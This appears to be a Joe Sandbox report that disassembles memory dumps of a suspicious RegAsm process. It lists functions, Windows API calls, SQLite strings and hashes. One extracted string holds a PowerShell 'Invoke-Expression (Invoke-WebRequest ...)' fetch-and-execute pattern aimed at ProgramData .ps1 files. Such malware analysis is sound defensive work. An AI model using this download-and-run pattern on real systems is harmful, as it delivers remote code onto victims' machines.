Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: Invoke-Expression (Invoke-WebRequest -Uri "$" -UseBasicParsing).Content$"" $*.ps1$.ps1$<$C:\ProgramData\$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 2215929589-186952963
Opcode ID: 46e10d4c4e7e76fb46ca7988961a51191b454e96b3af44bc7cf6f3febe5ff9b1
Instruction ID: fa8f6e43a0c6782230aca54303917860090d0f7f5421da2d4c287f35756e6bbf
Opcode Fuzzy Hash: 46e10d4c4e7e76fb46ca7988961a51191b454e96b3af44bc7cf6f3febe5ff9b1
Instruction Fuzzy Hash: B2D15E71811249EACB15EBA5D952BDDBBB86F29304F1040AEF50573282DE781B4CCBB9

Uniqueness

Uniqueness Score: -1.00%

Function 1C283D20 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 223COMMON

Download Yara Rule

Strings

PRAGMA , xrefs: 1C283DC5
%Q., xrefs: 1C283E11
=%Q, xrefs: 1C283E7F

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: %Q.$=%Q$PRAGMA
API String ID: 0-2099833060
Opcode ID: 984e4c067087dccf824bbf5b41432daf55483bc1d5576a8d703a41e6df07b1e3
Instruction ID: bc21afa28f85d0eb9cb90817bcc5e0356d2ddad78fafad8aa35c9c169e99af66
Opcode Fuzzy Hash: 984e4c067087dccf824bbf5b41432daf55483bc1d5576a8d703a41e6df07b1e3
Instruction Fuzzy Hash: 667106B6A083129BD704CF18CC40B9BB7F4AF54B14F240669F9459B292E735E909CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 1C26B980 Relevance: 16.7, APIs: 11, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15bcbb388f11f436459849b439e2f048c2ac9616ec566adbf5737e34e0537172
Instruction ID: 6d8f67412133a914d3b5bd98a773871b6acb731f22ea7c166046c24ac29d2071
Opcode Fuzzy Hash: 15bcbb388f11f436459849b439e2f048c2ac9616ec566adbf5737e34e0537172
Instruction Fuzzy Hash: 1E8135758043A39BD7108F308840BAABBA0AF41204F740668FC9517E5AD735DDDAEBF2

Uniqueness

Uniqueness Score: -1.00%

Function 1C2AF600 Relevance: 16.7, APIs: 11, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
Instruction ID: 606c4260640fd14cd7072c2df3e70ad6843ad181f7d658ca4d19b124c2d6c27a
Opcode Fuzzy Hash: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
Instruction Fuzzy Hash: 0E51D375A043026BE700CE55DC80FAFB7E8EF84714F50062DF94497291E729EA5AC7BA

Uniqueness

Uniqueness Score: -1.00%

Function 1C2D1940 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 345COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1C2D1B17
misuse, xrefs: 1C2D1B21
%s at line %d of [%.10s], xrefs: 1C2D1B26
block, xrefs: 1C2D1A90

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$block$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-4016964285
Opcode ID: f85215f19f38189416e5595b1d578f8feb5eb926b878a8f785e99670d4c6f75f
Instruction ID: 95ade71d24c0de23cea9e7122c87b8ff28e8fee0aa02790f4cebd3448db868c3
Opcode Fuzzy Hash: f85215f19f38189416e5595b1d578f8feb5eb926b878a8f785e99670d4c6f75f
Instruction Fuzzy Hash: 53C106B1A04321DFDB10CF64DC84AAA77B4BF14324F264269FC499B611E731D914CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 1C27FED0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 257COMMON

Download Yara Rule

Strings

%llu, xrefs: 1C27FF3C
no more rows available, xrefs: 1C28006F
unknown error, xrefs: 1C28003E
another row available, xrefs: 1C280076, 1C280081
abort due to ROLLBACK, xrefs: 1C280068
%llu, xrefs: 1C27FFF7

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: %llu$%llu$abort due to ROLLBACK$another row available$no more rows available$unknown error
API String ID: 0-1539118790
Opcode ID: 7fa4d992b454b699688cfb910bc7237e0609994d854be57335dc07f8752e2efc
Instruction ID: e1eb194a1f4d2147fb3e0ce92d3b0851539c945641f011be292acaa67f2209ae
Opcode Fuzzy Hash: 7fa4d992b454b699688cfb910bc7237e0609994d854be57335dc07f8752e2efc
Instruction Fuzzy Hash: 249105717093119BD704CE18CC84B9AB7E1FF89324F24062DF98A9B391D73AE845CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1C273A50 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 172COMMON

Download Yara Rule

Strings

bad page number, xrefs: 1C273BE3
read-only, xrefs: 1C273A71
cannot delete, xrefs: 1C273A82
bad page value, xrefs: 1C273BDC
no such schema, xrefs: 1C273BEA
cannot insert, xrefs: 1C273BF1, 1C273C52

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: bad page number$bad page value$cannot delete$cannot insert$no such schema$read-only
API String ID: 0-1499782803
Opcode ID: 338d29e0e585365ddfe3a73d1ee803af4667353d76a6762b9cd7331b6081bcf4
Instruction ID: 4ea431c6a94000303bec0e7ddf8ee76001ce009555d0f3c99c4f32f75d0da908
Opcode Fuzzy Hash: 338d29e0e585365ddfe3a73d1ee803af4667353d76a6762b9cd7331b6081bcf4
Instruction Fuzzy Hash: C25105B1608312DBE714CF19C8C7B5677F4EB64A14F254469F845CB201E736E859CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(75AA5460,?,75AA5460,00000000,?,0040C0A5,0040C8C0,?,0040C8C0,?,75AA5460,00000000), ref: 0040BF5F
strchr.MSVCRT ref: 0040BF75
strchr.MSVCRT ref: 0040BFA6
lstrlen.KERNEL32(75AA5460,?,?,?,?,?,0040C0A5,0040C8C0,?,0040C8C0,?,75AA5460,00000000), ref: 0040BFC6
GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,0040C0A5,0040C8C0,?,0040C8C0,?,75AA5460,00000000), ref: 0040BFD7
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040C0A5,0040C8C0,?,0040C8C0,?,75AA5460,00000000), ref: 0040BFDE
lstrlen.KERNEL32(75AA5460,?,?,?,?,?,0040C0A5,0040C8C0,?,0040C8C0,?,75AA5460,00000000), ref: 0040BFEE
strcpy_s.MSVCRT ref: 0040C01A

Strings

0123456789ABCDEF, xrefs: 0040BF2B

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$Heapstrchr$AllocProcessstrcpy_s
String ID: 0123456789ABCDEF
API String ID: 4020929367-2554083253
Opcode ID: fd006f9b56bc7ef8a4b9ae5c8e524a07b9f310a438a39e7189a40d8a275efe6b
Instruction ID: 5966ea1f0e642e750bc4dd4ac55007b62af0bfa430af95c807717a58a61a9fb0
Opcode Fuzzy Hash: fd006f9b56bc7ef8a4b9ae5c8e524a07b9f310a438a39e7189a40d8a275efe6b
Instruction Fuzzy Hash: DE31B676A002059FC710DFA9DC45BAEBBB9EF8D714F40416AF919E7381D7389901CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 1C2AF4B0 Relevance: 15.1, APIs: 10, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
Instruction ID: 12b939e2e4752e1e88775113eaf6029dbbe7526e66273dd18626bda05e6ad7c1
Opcode Fuzzy Hash: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
Instruction Fuzzy Hash: C6219EBA90034267F712DA215C01FEF339C5F42306F254A18FA54A2081F738E60A82FB

Uniqueness

Uniqueness Score: -1.00%

Function 1C36FB30 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 324COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1C36FB96
misuse, xrefs: 1C36FBA0
%s at line %d of [%.10s], xrefs: 1C36FBA5
API called with NULL prepared statement, xrefs: 1C36FB65
API called with finalized prepared statement, xrefs: 1C36FB7A

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: e417801ac7d4e05b855c757cf706574b3ee2e8a21d97ea51917899e1134227c7
Instruction ID: 84002f087370dfb2031421ad7a74bfe6091e6806b428d8c8018e7fa9d95a793b
Opcode Fuzzy Hash: e417801ac7d4e05b855c757cf706574b3ee2e8a21d97ea51917899e1134227c7
Instruction Fuzzy Hash: A7B1F5B4A047219BE7209F35DC45B5B7BE4BF49318F40062CE88A87A45E775E609CFB2

Uniqueness

Uniqueness Score: -1.00%

Function 1C2E1710 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 235COMMON

Download Yara Rule

Strings

%z%s%Q, xrefs: 1C2E180D
%z, %Q HIDDEN, %s HIDDEN), xrefs: 1C2E1831
CREATE TABLE x(, xrefs: 1C2E17D9
rank, xrefs: 1C2E1824

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: %z%s%Q$%z, %Q HIDDEN, %s HIDDEN)$CREATE TABLE x($rank
API String ID: 0-3324442540
Opcode ID: 07b05ecfa39840326389627ce6f0977551cef8c79bcd21b183ec5ec96f288136
Instruction ID: d2d079a215f15d0abe4a4f7cf84da25bf033e6c3c63d760ccfe5f6536f490886
Opcode Fuzzy Hash: 07b05ecfa39840326389627ce6f0977551cef8c79bcd21b183ec5ec96f288136
Instruction Fuzzy Hash: 5281D1B1A04322DBEB048F64DC44E9BB7F4FF48255F640629FD44A7212E735E954CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1C3574A0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 175COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1C3574CD
misuse, xrefs: 1C3574D7
%s at line %d of [%.10s], xrefs: 1C3574DC
invalid, xrefs: 1C3574BC
API call with %s database connection pointer, xrefs: 1C3574C1
unable to close due to unfinalized statements or unfinished backups, xrefs: 1C3575D1

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
API String ID: 0-3800776574
Opcode ID: fa30c54b54473b22bfc92da1b2a9fb4236c5aa96d03c10ff4d845e7ade5f4313
Instruction ID: 39490231758a0b664c94162707b59ea32ec5ab56339f61fb777164f97542feff
Opcode Fuzzy Hash: fa30c54b54473b22bfc92da1b2a9fb4236c5aa96d03c10ff4d845e7ade5f4313
Instruction Fuzzy Hash: 2F5178B5A05B21ABE3228F38AC44F9B73B5AF42614F150628E84A93341E730F555CBB7

Uniqueness

Uniqueness Score: -1.00%

Function 00411AA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411AD5
GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,004075E6,0040DC76), ref: 00411B06
HeapAlloc.KERNEL32(00000000,?,004075E6,0040DC76), ref: 00411B0D
wsprintfW.USER32 ref: 00411B1C
OpenProcess.KERNEL32(00001001,00000000), ref: 00411B7D
TerminateProcess.KERNEL32(00000000,00000000), ref: 00411B8C
CloseHandle.KERNEL32(00000000), ref: 00411B93

Strings

%hs, xrefs: 00411B16

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
String ID: %hs
API String ID: 396451647-2783943728
Opcode ID: 2a9af94ab51f1c7612f2706503fe0e7467de995d476e1fae5c9432b40af36c71
Instruction ID: 62e53cf01b74de85e867b82ad9f5ad143882cdd6a93c6f1169250ec35743cbe0
Opcode Fuzzy Hash: 2a9af94ab51f1c7612f2706503fe0e7467de995d476e1fae5c9432b40af36c71
Instruction Fuzzy Hash: BD31B2B6900209ABDB10DF94DC85FEFB779EF0A700F50412AF609A7190E7385E85CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1C2FBCF0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 103COMMON

Download Yara Rule

Strings

PRAGMA %Q.page_size, xrefs: 1C2FBD03
undersize RTree blobs in "%q_node", xrefs: 1C2FBDA1
SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1, xrefs: 1C2FBD67

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: PRAGMA %Q.page_size$SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1$undersize RTree blobs in "%q_node"
API String ID: 0-3485589083
